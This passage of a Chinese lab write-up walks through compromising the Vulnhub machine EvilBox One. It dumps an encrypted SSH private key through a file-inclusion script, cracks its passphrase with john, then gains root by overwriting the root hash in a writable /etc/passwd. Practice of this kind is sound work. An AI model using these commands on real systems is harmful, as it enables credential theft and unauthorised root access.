    		DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
    		 
    		uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
    		hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
    		o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
    		+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
    		b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
    		HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
    		9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
    		zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
    		rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
    		tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
    		94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
    		VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
    		Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
    		hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
    		Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
    		IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
    		MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
    		62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
    		Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
    		p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
    		pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
    		KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
    		i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
    		4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
    		8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
    		-----END RSA PRIVATE KEY-----
    		输出 >>>/home/mowree/.ssh/id_rsa.pub:
    		输出 >>>/home/mowree/.ssh/ssh_host_dsa_key:
    		输出 >>>/home/mowree/.ssh/ssh_host_dsa_key.pub:
    		输出 >>>/home/mowree/.ssh/ssh_host_key:
    		输出 >>>/home/mowree/.ssh/ssh_host_key.pub:
    		输出 >>>/home/mowree/.ssh/ssh_host_rsa_key:
    		输出 >>>/home/mowree/.ssh/ssh_host_rsa_key.pub:

中大奖:

  • /home/mowree/.ssh/authorized_keys

    		ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAXfEfC22Bpq40UDZ8QXeuQa6EVJPmW6BjB4Ud/knShqQ86qCUatKaNlMfdpzKaagEBtlVUYwit68VH5xHV/QIcAzWi+FNw0SB2KTYvS514pkYj2mqrONdu1LQLvgXIqbmV7MPyE2AsGoQrOftpLKLJ8JToaIUCgYsVPHvs9Jy3fka+qLRHb0HjekPOuMiq19OeBeuGViaqILY+w9h19ebZelN8fJKW3mX4mkpM7eH4C46J0cmbK3ztkZuQ9e8Z14yAhcehde+sEHFKVcPS0WkHl61aTQoH/XTky8dHatCUucUATnwjDvUMgrVZ5cTjr4Q4YSvSRSIgpDP2lNNs1B7 mowree@EvilBoxOne

  • /home/mowree/.ssh/id_rsa

    		-----BEGIN RSA PRIVATE KEY-----
    		Proc-Type: 4,ENCRYPTED
    		DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
    		 
    		uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6
    		hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe
    		o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb
    		+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot
    		b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k
    		HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg
    		9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY
    		zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu
    		rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1
    		tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs
    		94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm
    		VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7
    		Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P
    		hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr
    		Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR
    		IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R
    		MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS
    		62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69
    		Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8
    		p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C
    		pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X
    		KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa
    		i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp
    		4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/
    		8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==
    		-----END RSA PRIVATE KEY-----

我们直接抓到 mowree 公钥和私钥信息,我们通过盗窃私钥即可进行攻击

  • 通过此命令组合盗窃 touch id_rsa && curl "http://192.168.56.117/secret/evil.php?command=/home/mowree/.ssh/id_rsa" > id_rsa && chmod 600 id_rsa

  • 尝试登录 ssh mowree@192.168.56.117 -i id_rsa

    • -i 指定登录的验证密钥
    		┌──(kali㉿kali)-[~/workspace]
    		└─$ ssh mowree@192.168.56.117 -i id_rsa 
    		The authenticity of host '192.168.56.117 (192.168.56.117)' can't be established.
    		ED25519 key fingerprint is SHA256:0x3tf1iiGyqlMEM47ZSWSJ4hLBu7FeVaeaT2FxM7iq8.
    		This key is not known by any other names
    		Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
    		nter passphrase for key 'id_rsa':

登录后需要密码,我们暂且尝试 john 爆破

  • 首先我们需要将得到的私钥转化为 john 可以理解的格式 /usr/share/john/ssh2john.py ./id_rsa > ./hash_id_rsa
  • 爆破 john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt 如果 rockyou.txt 没有,需要解压 rockyou.txt.gz 命令 sudo gzip -d /usr/share/wordlists/rockyou.txt.gz
┌──(kali㉿kali)-[~/workspace]
└─$ john hash_id_rsa --wordlist=/usr/share/wordlists/rockyou.txt                                                                          1 ⨯
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn          (./id_rsa)     
1g 0:00:00:00 DONE (2022-11-10 19:22) 50.00g/s 62100p/s 62100c/s 62100C/s unicorn
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
  • 结果为 unicorn
┌──(kali㉿kali)-[~/workspace]
└─$ ssh mowree@192.168.56.117 -i id_rsa
Enter passphrase for key 'id_rsa': 
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

登录成功,我们可以进行下一步

提权

探索一下文件目录,发现第一个 flag

mowree@EvilBoxOne:~$ ls
user.txt
mowree@EvilBoxOne:~$ cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

当然我们还是需要继续提权获得 root

  • 查看 sudo 相关,发现无果
  • 查看版本,发现内核利用也无果
  • 查看我们具有写权限的隐秘文件是否存在 find / -writable 2>/dev/null | grep 'etc' 一般查看配置文件目录
mowree@EvilBoxOne:~$ find / -writable 2>/dev/null | grep 'etc'
/etc/passwd

  • 又是这个文件 /etc/passwd

  • 这个文件如果有写权限,即可强行篡改用户密码

  • 我们拟定一个密码 123 使用 openssl passwd -1 生成 $1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/

  • 篡改 /etc/passwd

    		root:$1$ttAneAtg$4fJVH7JPaan5i4rI.t2xy/:0:0:root:/root:/bin/bash

  • 使用 su root 登录

    		mowree@EvilBoxOne:~$ su root
    		Contraseña: 
    		root@EvilBoxOne:/home/mowree# id
    		uid=0(root) gid=0(root) grupos=0(root)

结果

root@EvilBoxOne:/home/mowree# ls
user.txt
root@EvilBoxOne:/home/mowree# cat user.txt 
56Rbp0soobpzWSVzKh9YOvzGLgtPZQ

GAME OVER

posted @   sha0dow  阅读(280)  评论(0编辑  收藏  举报
相关博文:
· 靶机练习: hacksudo---Thor
· 靶机练习: y0usef
· Vulnhub之EvilBox 1超级详细测试过程
· Vulnhub靶场--EVILBOX: ONE
· Vulnhub EvilBox One靶机攻略
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· DeepSeek 开源周回顾「GitHub 热点速览」
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
点击右上角即可分享
微信分享提示